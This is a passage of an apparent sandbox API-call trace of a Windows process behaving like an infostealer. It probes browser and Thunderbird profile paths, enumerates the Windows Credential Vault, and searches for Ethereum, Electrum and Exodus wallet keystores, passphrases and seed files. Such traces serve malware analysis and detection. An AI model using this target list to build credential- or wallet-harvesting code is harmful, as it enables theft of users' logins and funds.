ftCreationTime.dwLowDateTime=0x6f0065, ftCreationTime.dwHighDateTime=0x5c006e, ftLastAccessTime.dwLowDateTime=0x730055, ftLastAccessTime.dwHighDateTime=0x720065, ftLastWriteTime.dwLowDateTime=0x440020, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x5c0061, nFileSizeLow=0x6f004c, dwReserved0=0x610063, dwReserved1=0x20006c, cFileName="S", cAlternateFileName="n\x01")) returned 0xffffffff [0234.590] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.590] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0234.590] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0234.590] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" [0234.590] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0xffffffff [0234.590] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.591] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\FlashPeak\\SlimBrowser\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" [0234.591] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" [0234.591] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini" [0234.591] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flashpeak\\slimbrowser\\profiles.ini")) returned 0xffffffff [0234.591] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.592] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0234.592] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0234.592] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" [0234.592] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini")) returned 0xffffffff [0234.592] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.592] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0234.592] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0234.592] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" [0234.592] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini")) returned 0xffffffff [0234.593] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.593] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0234.593] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0234.593] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" [0234.593] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini")) returned 0xffffffff [0234.593] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.594] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0234.594] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0234.594] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" [0234.594] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini")) returned 0xffffffff [0234.594] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.595] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0234.595] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0234.595] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" [0234.595] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini")) returned 0xffffffff [0234.595] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.595] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0234.595] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0234.595] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" [0234.596] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\profiles.ini")) returned 0xffffffff [0234.596] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19858c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.596] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0234.596] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0234.597] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" [0234.597] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini")) returned 0xffffffff [0234.597] GetVersionExA (in: lpVersionInformation=0x1983fc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1983fc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0234.597] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6d620000 [0234.597] VaultOpenVault () returned 0x0 [0234.601] VaultEnumerateItems () returned 0x0 [0234.602] VaultFree () returned 0x0 [0234.602] VaultCloseVault () returned 0x0 [0234.603] FreeLibrary (hLibModule=0x6d620000) returned 1 [0234.603] lstrlenA (lpString="") returned 0 [0234.605] lstrlenA (lpString="5qDlPuVKoR.txt") returned 14 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".Z") returned 26 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".zip") returned -6 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".zoo") returned -6 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".arc") returned 19 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".lzh") returned 8 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".arj") returned 19 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".gz") returned 13 [0234.605] StrCmpCA (pszStr1=".txt", pszStr2=".tgz") returned 17 [0234.605] FreeLibrary (hLibModule=0x0) returned 0 [0234.605] FreeLibrary (hLibModule=0x0) returned 0 [0234.605] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.606] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Ethereum\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" [0234.606] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ethereum")) returned 0 [0234.606] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore") returned 56 [0234.606] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.606] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.607] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" [0234.607] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum\\wallets")) returned 0 [0234.607] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*") returned 59 [0234.607] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.620] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.633] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum-LTC\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" [0234.633] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum-ltc\\wallets")) returned 0 [0234.633] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*") returned 63 [0234.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.633] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.634] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0234.634] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0234.634] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json") returned 62 [0234.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.634] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.635] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0234.635] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0234.635] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json") returned 63 [0234.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.635] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.636] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0234.636] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0234.636] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json") returned 75 [0234.636] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.636] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.636] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0234.637] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0234.637] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco") returned 69 [0234.637] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.637] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.637] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", 